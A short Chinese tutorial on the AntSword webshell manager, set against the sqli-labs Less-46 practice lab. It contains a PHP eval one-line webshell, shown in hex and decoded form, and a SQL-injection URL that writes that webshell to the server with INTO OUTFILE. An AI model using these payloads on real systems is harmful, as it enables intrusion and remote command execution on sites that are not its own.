中国蚁剑使用方法

找到mysql配置文件

python 复制代码
secure-file-priv=

工作目录

python 复制代码
D:\tool\huli\gui_webshell\AntSword\AntSword\antSword-master

重点是tool目录后面 前面大家可能都不一样

添加数据

一句话木马

python 复制代码
3C3F706870206576616C28245F504F53545B22636D64225D293B3F3E
翻译过来
<?php eval($_POST["cmd"]);?>

示例天书第46关上传木马

python 复制代码
/?sort=1%20into%20outfile%20"D:\\phpstudy_pro\\WWW\\sql\\sqli-labs-master\\Less-46\\test1.php"%20lines%20terminated%20by%200x3c3f706870206576616c28245f504f53545b22636d64225d293b3f3e

选择你上传一句话木马的url地址 具体到 你上传的文件名

这个参数就是连接密码

完成操作后 可以操作对方的目录

相关推荐
在安全厂商修设备4 小时前
SQL注入与防御-第六章-3:利用操作系统--巩固访问
sql·web安全·网络安全
王天天(Bennet)9 小时前
【防火墙基础之传统墙到 UTM 到 NGFW 再到 AI 的变化】
人工智能·网络安全·防火墙·ngfw·防火墙发展与认知
2501_9160088919 小时前
iOS App抓包工具排查后台唤醒引发请求异常
websocket·网络协议·tcp/ip·http·网络安全·https·udp
Bruce_Liuxiaowei21 小时前
安全分析:Zabbix 路径探测请求解析
安全·网络安全·zabbix
武汉唯众智创1 天前
高职院校“赛岗课”一体化网络安全实战类人才培养方案
网络·安全·web安全·网络安全·“赛岗课”一体化·赛岗课
2501_915918411 天前
iPhone 抓包工具有哪些?多工具对比分析优缺点
websocket·网络协议·tcp/ip·http·网络安全·https·udp
游戏开发爱好者81 天前
iOS 出海 App 安全加固指南:无源码环境下的 IPA 加固与防破解方法
websocket·网络协议·tcp/ip·http·网络安全·https·udp
2501_915921431 天前
苹果App上架流程:不用Mac也可以上架的方法
websocket·网络协议·tcp/ip·http·网络安全·https·udp
网硕互联的小客服1 天前
服务器经常出现蓝屏是什么原因导致的?如何排查和修复?
运维·服务器·stm32·单片机·网络安全